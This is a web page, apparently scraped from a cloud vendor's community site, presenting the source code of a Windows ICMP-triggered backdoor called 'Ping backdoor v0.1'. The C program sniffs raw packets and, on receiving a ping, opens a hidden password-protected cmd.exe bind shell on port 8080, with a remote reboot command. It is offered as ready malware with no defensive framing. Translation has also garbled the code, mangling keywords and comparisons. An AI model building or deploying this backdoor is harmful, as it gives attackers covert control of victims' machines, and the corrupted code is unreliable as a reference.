Pingback backdoor (source code)

Source: Internet
Author: User
Tags set socket htons

# Include <stdio. h>
# Include <stdlib. h>
# Include <winsock2.h>
// # Include <ws2tcpip. h>
# Include <mstcpip. h>

# Define ICMP_Echo 8 // The type of ICMP echo request message is 8
# Define ICMP_ECHOREPLY 0 // The type value of the ICMP echo response packet is 0
# Define sniffer_icmp_size 101 // large for listening to ICMP packets?
# Define bind_port 8080 // default bind shell Port
# Define max_packet 10000 // What is the maximum ICMP packet size?
# Define def_password "givemeshell! "// Default password

# Define xmalloc (s) heapalloc (getprocessheap (), heap_zero_memory, (s ))

// Define the IP Header
Typedef struct iphdr
{
Unsigned char h_verlen; // 4-bit header length, 4-bit IP address version 1
Unsigned char TOS; // 8-bit service type TOS 1
Unsigned short total_len; // The total length of 16 bits (in bytes) 2
Unsigned short ident; // 16-bit ID 2
Unsigned short frag_and_flags; // 3-digit flag 2
Unsigned char TTL; // 8-bit TTL 1
Unsigned char proto; // 8-bit protocol (TCP, UDP, or other) 1
Unsigned short checksum; // 16-bit IP header checksum 2
Unsigned int sourceip; // 32-bit source IP address 4
Unsigned int destip; // 32-bit destination IP address 4
} Ipheader; // IP header length: 20

// Define the ICMP Header
Typedef struct _ ihdr
{
Unsigned char I _type; // 8-bit type 1
Unsigned char I _code; // 8-bit code 1
Unsigned short I _cksum; // 16-bit checksum and 2
Unsigned short I _id; // identification number (identified by process number) 2
Unsigned short I _seq; // message serial number 2
} Icmpheader; // ICMP Header Length: 8

Int sniffer (); // listen to ICMP?
Void decode_sniffer (char *, Int, struct sockaddr_in *); // simple sniffer unpacking program
Int bindshell (); // bind Shell

DWORD dwbufferlen [10];
DWORD dwbufferinlen = 1;
DWORD dwbytesreturned = 0;
Handle bindthread;

// Main icmpdoor Function
Int main (INT argc, char ** argv)
{
Wsadata;
Int retval;

// Socket Initialization
If (retval = wsastartup (makeword (2, 2), & wsadata ))! = 0)
{
Printf ("wsastartup failed: % d/N", retval );
Exit (-1 );
}

// Start sniffer
Sniffer ();

// Socket ends
Wsacleanup ();
Return 0;
}

// Main function of sniffer
Int sniffer ()
{
Int packsize = sniffer_icmp_size;
Socket socksniffer;
Struct sockaddr_in DEST, from;
Struct hostent * HP;
Int sread;
Int fromlen = sizeof (from );
Unsigned char localname [256];
Char * recvbuf;

// Create an original socket to accept all received packets (sniffer)
If (socksniffer = wsasocket (af_inet, sock_raw, ipproto_ip, null, 0, wsa_flag_overlapped) = invalid_socket)
{
Printf ("wsasocket () failed: % d/N", wsagetlasterror ());
Return-1;
}

// Obtain the local address
Gethostname (char *) localname, sizeof (localname)-1 );
If (HP = gethostbyname (char *) localname) = NULL)
{
Return-1;
}
Memset (& DEST, 0, sizeof (DEST ));
Memcpy (& DeST. sin_addr.s_addr, HP-> h_addr_list [0], HP-> h_length); // TCP sniffing options
DeST. sin_family = af_inet;
DeST. sin_port = htons (8000); // specify any port
// Socket bind
BIND (socksniffer, (psockaddr) & DEST, sizeof (DEST ));

// Set socket to accept all packets
Wsaioctl (socksniffer, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen), & dwbufferlen,

Sizeof (dwbufferlen), & dwbytesreturned, null, null );

// Allocate the socket receiving buffer size to max_packet
Recvbuf = (char *) xmalloc (max_packet );

Printf ("sniffer OK! ");

// The size of the loop listener package
While (1)
{
// Read data
Sread = recvfrom (socksniffer, recvbuf, max_packet, 0, (struct sockaddr *) & from, & fromlen );

// If an error occurs while reading data
If (sread = socket_error | sread <0)
{
If (wsagetlasterror () = wsaetimedout)
{
Continue;
}
Printf ("recvfrom failed: % d/N", wsagetlasterror ());
Return-1;
}
Else
// If (sread> = 28)
// If the size of the read data = the size of the listener package + 28
If (sread = packsize + 28)
{
// Send the received data to the sniffer unpacking program for processing.
Decode_sniffer (recvbuf, sread-28, & from );
}
}
Return 1;
}

// Simple sniffer unpacking program
Void decode_sniffer (char * Buf, int bytes, struct sockaddr_in * From)
{
Icmpheader * icmphdr;

// The ICMP header address equals the length of the BUF + IP header: BUF + 20
Icmphdr = (icmpheader *) (BUF + sizeof (ipheader ));

/*
Printf ("/R/n % d bytes from % s,", bytes, inet_ntoa (from-> sin_addr); // retrieve the received data
Printf ("icmp_type: % d", icmphdr-> I _type); // check type
Printf ("icmp_seq: % d/R/N", icmphdr-> I _seq); // retrieve the serial number

//? Outbound data segment BUF + 28 + I
For (INT I = 0; I <bytes-1; I ++)
{
Printf ("% C", * (BUF + sizeof (ipheader) + sizeof (icmpheader) + I ));
}
*/

// If (icmphdr-> I _type = ICMP_Echo | icmphdr-> I _type = ICMP_ECHOREPLY)
// Determine if the packet is an ICMP request packet
If (icmphdr-> I _type = ICMP_Echo)
{
// Bind Shell
Bindshell ();

// DWORD bid;
// Bindthread = createthread (null, 0, bindshell, 0, 0, & bid );
}
Else
Printf ("/R/n get other packets! ");

Return;
}

// Bind shell function
Int bindshell (){
Int bport = bind_port;
Socket bindserver, getclient;
Struct sockaddr_in addrserver, addrclient;
Char buff [4096];
Char * messages = "/R/n ====================== Ping backdoor v0.1 ==== =================================/R/n =========== code by lion.

Welcome to http: // www.cnhonker.net ========/R/N ";
Char * getpass = "/R/n your password :";
Char * passok = "/R/n OK! Please enter :";
Char * nothispass = "/R/n sorry, your password not right./R/N ";
Char * exitok = "/R/n exit OK! /R/N ";
Char * rebootok = "/R/n reboot now! /R/N ";

// Create a socket
Bindserver = socket (af_inet, sock_stream, ipproto_tcp );

// Specify the server address and port
Addrserver. sin_family = af_inet;
Addrserver. sin_port = htons (bport );
Addrserver. sin_addr.s_addr = addr_any;

// Set timeout
Int timeout = 60000;
Setsockopt (bindserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));

// Set the reuse Port
Uint breuser = 1;
Setsockopt (bindserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));

// Listening port
BIND (bindserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));
Listen (bindserver, 2 );

Printf ("/R/n bind port on % d OK.", bport );

// Accept client connection
Int ilen = sizeof (addrclient );

// Receives one connection
Getclient = accept (bindserver, (struct sockaddr *) & addrclient, & ilen );

If (getclient! = Invalid_socket)
{
// If there is a connection, set the delay to 60 s.
Int itimeout = 60000;
Setsockopt (getclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));
}
Else
Return-1;

// Write welcome information
Send (getclient, messages, strlen (messages), 0 );

// WRITE password verification information
Send (getclient, getpass, strlen (getpass), 0 );

// Receive data
Recv (getclient, buff, 0 );

// Verify the password
If (! (Strstr (buff, def_password )))
{
// If the password is incorrect, write the Password error message
Send (getclient, nothispass, strlen (nothispass), 0 );
Printf ("/R/n password not right! ");
Closesocket (getclient );
Closesocket (bindserver );
Return-1;
}

// Write verification information
Send (getclient, passok, strlen (passok), 0 );

// Create two anonymous Pipelines
Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;
Unsigned long lbytesread;

Security_attributes SA;

SA. nlength = 12;
SA. lpsecuritydescriptor = 0;
SA. binherithandle = true;

Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );
Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );

Startupinfo siinfo;
Char character line [] = "cmd.exe ";
Process_information processinformation;

Zeromemory (& siinfo, sizeof (siinfo ));
Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Siinfo. wshowwindow = sw_hide;
Siinfo. hstdinput = hreadpipe2; // read the data written by the socket to pipe2
Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1; // write data here

Printf ("/R/n pipe create OK! ");

// Create a cmd process that reads data from hreadpipe2 and writes data to hwritepipe1
Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );

While (1)
{
// Check whether data is returned in the MPs queue
Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );

If (lbytesread)
{
// Read data from the pipeline hreadpipe1
Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );
If (! RET) break;

// Write the data read from the pipeline hreadpipe1 to the getclient
Ret = Send (getclient, buff, lbytesread, 0 );
If (Ret <= 0) break;
}
Else
{
// If the getclient connection receives data
Lbytesread = Recv (getclient, buff, 1024,0 );
If (lbytesread <= 0) break;

// Write the data read from the getclient connection to hwritepipe2
Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );

If (lbytesread> 4 & buff [0] = 'E' & buff [1] = 'X' & buff [2] = 'I '&& buff [3] = 'T ')
{
// Write and exit Information
Send (getclient, exitok, strlen (exitok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Return 1;
}
Else if (lbytesread> 6 & buff [0] = 'R' & buff [1] = 'E' & buff [2] = 'B '& & buff [3] = 'O '&&

Buff [1] = 'O' & buff [2] = 'T ')
{
// Write restart
Send (getclient, rebootok, strlen (rebootok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Exitwindowsex (ewx_reboot, null );
Return 1;
}

If (! RET) break;
}
}

Closesocket (getclient );
Closesocket (bindserver );
Return 1;
}

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.